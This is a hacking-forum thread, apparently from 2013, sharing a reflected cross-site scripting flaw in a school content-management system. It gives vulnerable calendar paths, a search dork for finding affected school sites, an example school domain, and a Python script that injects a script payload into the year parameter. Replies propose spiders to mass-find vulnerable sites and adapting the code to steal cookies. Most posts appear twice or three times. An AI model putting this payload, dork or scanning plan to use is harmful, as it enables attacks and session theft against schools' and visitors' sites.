Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


SchoolCMS software vulnerable to more XSS. filter_list
Author
Message
SchoolCMS software vulnerable to more XSS. #1
Shame this time its not persistent, I originally found a persistent XSS on this software in the eventform.php file. There is records for this on exploit.db. This times its a non persistent but it remains in dozens and dozens of schools and .org sites.

Exploit:
/old_core/cal/month.php?cid=
/old_core/cal/day.php?catid=
/old_core/cal/week.php?catid=

The y parameter is vulnerable to XSS. If you are too lazy to do manually, here is a python script to do it for you Tongue.

Code:
#!/usr/bin/python
import sys
import webbrowser
import urllib2
    
print "######################################"
print "#SchoolCMS auto-XSS inject script    #"
print "#Dork: inurl:/old_core/cal/month.php #"
print "#Author: VipVince                    #"
print "#Vendor: www.poweritschools.com      #"
print "#                                    #"
print "######################################"
    
print "XSS lies in y=parameter of the URL in the calender. (Year)"
print "After dorking a site, Enter URL like: www.oaklandschoolsnj.org"
print "Let the script do the rest ;)"

payload = "/old_core/cal/month.php?cid=&catid=&m=-1&w=5&y=<script>alert(1)</script>"
site = raw_input('Enter site to XSS: ')
inject = webbrowser.open(site+payload)
raw_input("Press any key to exit ")

Enjoy Wink

Reply

SchoolCMS software vulnerable to more XSS. #2
Shame this time its not persistent, I originally found a persistent XSS on this software in the eventform.php file. There is records for this on exploit.db. This times its a non persistent but it remains in dozens and dozens of schools and .org sites.

Exploit:
/old_core/cal/month.php?cid=
/old_core/cal/day.php?catid=
/old_core/cal/week.php?catid=

The y parameter is vulnerable to XSS. If you are too lazy to do manually, here is a python script to do it for you Tongue.

Code:
#!/usr/bin/python
import sys
import webbrowser
import urllib2
    
print "######################################"
print "#SchoolCMS auto-XSS inject script    #"
print "#Dork: inurl:/old_core/cal/month.php #"
print "#Author: VipVince                    #"
print "#Vendor: www.poweritschools.com      #"
print "#                                    #"
print "######################################"
    
print "XSS lies in y=parameter of the URL in the calender. (Year)"
print "After dorking a site, Enter URL like: www.oaklandschoolsnj.org"
print "Let the script do the rest ;)"

payload = "/old_core/cal/month.php?cid=&catid=&m=-1&w=5&y=<script>alert(1)</script>"
site = raw_input('Enter site to XSS: ')
inject = webbrowser.open(site+payload)
raw_input("Press any key to exit ")

Enjoy Wink

Reply

RE: SchoolCMS software vulnerable to more XSS. #3
It looks like you're looking for vulnerabilities in any kind of CMS.

What if you made a script parsing lists of sites and testing to find what sites use this CMS and are thus vulnerable to this vulnerability? Not enough challenging? What if you made a spider using search engines to find new sites and you checked to find which ones are vulnerable? Too much challenging? If you choose to make something like this and need some help on any point, just give a call, I'd like to help out as I can.
My Bitcoin address: 1AtxVsSSG2Z8JfjNy9KNFDUN6haeKr7LiP
Give me money by visiting www.google.com here: http://coin-ads.com/6Ol83U

If you want a Bitcoin URL shortener/advertiser, please, use this referral: http://coin-ads.com/register.php?refid=noize

Reply

RE: SchoolCMS software vulnerable to more XSS. #4
It looks like you're looking for vulnerabilities in any kind of CMS.

What if you made a script parsing lists of sites and testing to find what sites use this CMS and are thus vulnerable to this vulnerability? Not enough challenging? What if you made a spider using search engines to find new sites and you checked to find which ones are vulnerable? Too much challenging? If you choose to make something like this and need some help on any point, just give a call, I'd like to help out as I can.
My Bitcoin address: 1AtxVsSSG2Z8JfjNy9KNFDUN6haeKr7LiP
Give me money by visiting www.google.com here: http://coin-ads.com/6Ol83U

If you want a Bitcoin URL shortener/advertiser, please, use this referral: http://coin-ads.com/register.php?refid=noize

Reply

RE: SchoolCMS software vulnerable to more XSS. #5
(07-11-2013, 06:11 PM)noize Wrote: It looks like you're looking for vulnerabilities in any kind of CMS.

What if you made a script parsing lists of sites and testing to find what sites use this CMS and are thus vulnerable to this vulnerability? Not enough challenging? What if you made a spider using search engines to find new sites and you checked to find which ones are vulnerable? Too much challenging? If you choose to make something like this and need some help on any point, just give a call, I'd like to help out as I can.

This lies in a particular cms made by powerITschools in the month.php file. The dork will find you dozens of websites running it. Thanks for the suggestions, I will look into them.

Reply

RE: SchoolCMS software vulnerable to more XSS. #6
(07-11-2013, 06:11 PM)noize Wrote: It looks like you're looking for vulnerabilities in any kind of CMS.

What if you made a script parsing lists of sites and testing to find what sites use this CMS and are thus vulnerable to this vulnerability? Not enough challenging? What if you made a spider using search engines to find new sites and you checked to find which ones are vulnerable? Too much challenging? If you choose to make something like this and need some help on any point, just give a call, I'd like to help out as I can.

This lies in a particular cms made by powerITschools in the month.php file. The dork will find you dozens of websites running it. Thanks for the suggestions, I will look into them.

Reply

RE: SchoolCMS software vulnerable to more XSS. #7
Let's adapt that code to borrow some cookies Biggrin
Yar-har Fiddle-dee-dee, being a pirate is alright to be! Do what you want cause a pirate is free, you are a pirate! AHOY!


[Image: tumblr_m7isvt2N171ranhnao1_500.gif]

Reply

RE: SchoolCMS software vulnerable to more XSS. #8
Let's adapt that code to borrow some cookies Biggrin
Yar-har Fiddle-dee-dee, being a pirate is alright to be! Do what you want cause a pirate is free, you are a pirate! AHOY!


[Image: tumblr_m7isvt2N171ranhnao1_500.gif]

Reply

RE: SchoolCMS software vulnerable to more XSS. #9
Let's adapt that code to borrow some cookies Biggrin
Yar-har Fiddle-dee-dee, being a pirate is alright to be! Do what you want cause a pirate is free, you are a pirate! AHOY!


[Image: tumblr_m7isvt2N171ranhnao1_500.gif]

Reply







Users browsing this thread: 2 Guest(s)